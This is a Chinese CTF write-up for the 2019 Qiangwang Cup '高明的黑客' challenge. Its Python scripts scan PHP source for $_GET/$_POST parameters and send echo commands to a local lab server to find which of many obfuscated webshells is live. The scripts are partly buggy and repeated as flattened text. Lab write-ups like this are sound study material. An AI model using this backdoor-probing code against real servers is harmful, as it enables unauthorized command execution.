高明的黑客

D盾扫一堆混淆+shell，不过没有几个是能用的，需要跑个脚本，考察脚本编写能力的，测试一下哪个是能用的。

上py

import os
import requests
# 文件路径
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# 遍历文件目录查找文件
files = os.listdir(path=path)


# GET方法传参
def GET(filename):
    f = open(path + filename, 'r')
    getList = []
    content = f.readlines()

    for line in content:
        if line.find("$_GET['") > 0:
            startIndex = line.find("$_GET['") + 7
            endIndex = line.find("'", startIndex)
            getList.append(line[startIndex:endIndex])
    return getList


# POST方法传参
def POST(filename):
    f = open(path + filename, 'r')
    postList = []
    content = f.readlines()

    for line in content:
        if line.find("$_POST['") > 0:
            startIndex = line.find("$_POST['") + 8
            endIndex = line.find("'", startIndex)
            postList.append(line[startIndex:endIndex])
    return postList


if __name__ == "__main__":
    for file in files:
        if file != ".idea":
            print("OPEN FILE:" + file)
            get = GET(file)
            for i in get:
                url = "http://127.0.0.1/%s?$s=%s".format(file, i, 'echo "GET SUCCESS"')
                response = requests.get(url=url)
                if response.text.find("GET SUCCESS") > 0:
                    print("SUCCESS GET! YOU FIND THE SHELL %s BY %s".format(file, i))
                    exit(0)

            post = POST(file)
            for i in post:
                url = "http://127.0.0.1/%s".format(file)
                data = {i: 'echo "POST SUCCESS"'}
                response = requests.get(url=url, data=data)
                if response.text.find("POST SUCCESS") > 0:
                    print("SUCCESS POST! YOU FIND THE SHELL %s BY %s".format(file, i))
                    exit(0)

        print("CLOSE FILE")

贼捞，大概一分钟跑七到八个这样子，算了算根本跑不完。

还是要多线程，最后参考大佬脚本搞的。

/xk0SzyKwfzw.php?Efa5BVG=echo%20%27success%27

import os
import requests
import threading
import time
import sys

# 文件路径
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# 遍历文件目录查找文件
files = os.listdir(path=path)


# GET方法传参
def GET(filename):
    f = open(path + filename, 'r')
    getList = []
    content = f.readlines()

    for line in content:
        if line.find("$_GET['") > 0:
            startIndex = line.find("$_GET['") + 7
            endIndex = line.find("'", startIndex)
            getList.append(line[startIndex:endIndex])
    return getList


# POST方法传参
def POST(filename):
    f = open(path + filename, 'r')
    postList = []
    content = f.readlines()

    for line in content:
        if line.find("$_POST['") > 0:
            startIndex = line.find("$_POST['") + 8
            endIndex = line.find("'", startIndex)
            postList.append(line[startIndex:endIndex])
    return postList


def get_content(file):
    print("OPEN FILE:" + file)
    get = GET(file)
    for i in get:
        url = "http://127.0.0.1/src/{}?{}={}".format(file, i, 'echo "GET '
                                                              'SUCCESS"')
        response = requests.get(url=url)
        if response.text.find("GET SUCCESS") > 0:
            print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i))
            f = open("shell.txt", "w")
            f.write(response.text)
            sys.exit(0)

    post = POST(file)
    for i in post:
        url = "http://127.0.0.1/src/{}".format(file)
        data = {i: 'echo "POST SUCCESS"'}
        response = requests.get(url=url, data=data)
        if response.text.find("POST SUCCESS") > 0:
            print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i))
            f = open("shell.txt", "w")
            f.write(response.text)
            sys.exit(0)
        response.close()

    print("CLOSE FILE")


if __name__ == "__main__":
    s1 = threading.Semaphore(100)
    requests.adapters.DEFAULT_RETRIES = 5
    for file in files:
        get_content(file)
        t = threading.Thread(target=get_content, args=(file,))
        t.start()

Previous2019 强网杯 Next随便注

Last updated 2 years ago

import os import requests # 文件路径 path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//" # 遍历文件目录查找文件 files = os.listdir(path=path) # GET方法传参 def GET(filename): f = open(path + filename, 'r') getList = [] content = f.readlines() for line in content: if line.find("$_GET['") > 0: startIndex = line.find("$_GET['") + 7 endIndex = line.find("'", startIndex) getList.append(line[startIndex:endIndex]) return getList # POST方法传参 def POST(filename): f = open(path + filename, 'r') postList = [] content = f.readlines() for line in content: if line.find("$_POST['") > 0: startIndex = line.find("$_POST['") + 8 endIndex = line.find("'", startIndex) postList.append(line[startIndex:endIndex]) return postList if __name__ == "__main__": for file in files: if file != ".idea": print("OPEN FILE:" + file) get = GET(file) for i in get: url = "http://127.0.0.1/%s?$s=%s".format(file, i, 'echo "GET SUCCESS"') response = requests.get(url=url) if response.text.find("GET SUCCESS") > 0: print("SUCCESS GET! YOU FIND THE SHELL %s BY %s".format(file, i)) exit(0) post = POST(file) for i in post: url = "http://127.0.0.1/%s".format(file) data = {i: 'echo "POST SUCCESS"'} response = requests.get(url=url, data=data) if response.text.find("POST SUCCESS") > 0: print("SUCCESS POST! YOU FIND THE SHELL %s BY %s".format(file, i)) exit(0) print("CLOSE FILE")

import os import requests import threading import time import sys # 文件路径 path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//" # 遍历文件目录查找文件 files = os.listdir(path=path) # GET方法传参 def GET(filename): f = open(path + filename, 'r') getList = [] content = f.readlines() for line in content: if line.find("$_GET['") > 0: startIndex = line.find("$_GET['") + 7 endIndex = line.find("'", startIndex) getList.append(line[startIndex:endIndex]) return getList # POST方法传参 def POST(filename): f = open(path + filename, 'r') postList = [] content = f.readlines() for line in content: if line.find("$_POST['") > 0: startIndex = line.find("$_POST['") + 8 endIndex = line.find("'", startIndex) postList.append(line[startIndex:endIndex]) return postList def get_content(file): print("OPEN FILE:" + file) get = GET(file) for i in get: url = "http://127.0.0.1/src/{}?{}={}".format(file, i, 'echo "GET ' 'SUCCESS"') response = requests.get(url=url) if response.text.find("GET SUCCESS") > 0: print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i)) f = open("shell.txt", "w") f.write(response.text) sys.exit(0) post = POST(file) for i in post: url = "http://127.0.0.1/src/{}".format(file) data = {i: 'echo "POST SUCCESS"'} response = requests.get(url=url, data=data) if response.text.find("POST SUCCESS") > 0: print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i)) f = open("shell.txt", "w") f.write(response.text) sys.exit(0) response.close() print("CLOSE FILE") if __name__ == "__main__": s1 = threading.Semaphore(100) requests.adapters.DEFAULT_RETRIES = 5 for file in files: get_content(file) t = threading.Thread(target=get_content, args=(file,)) t.start()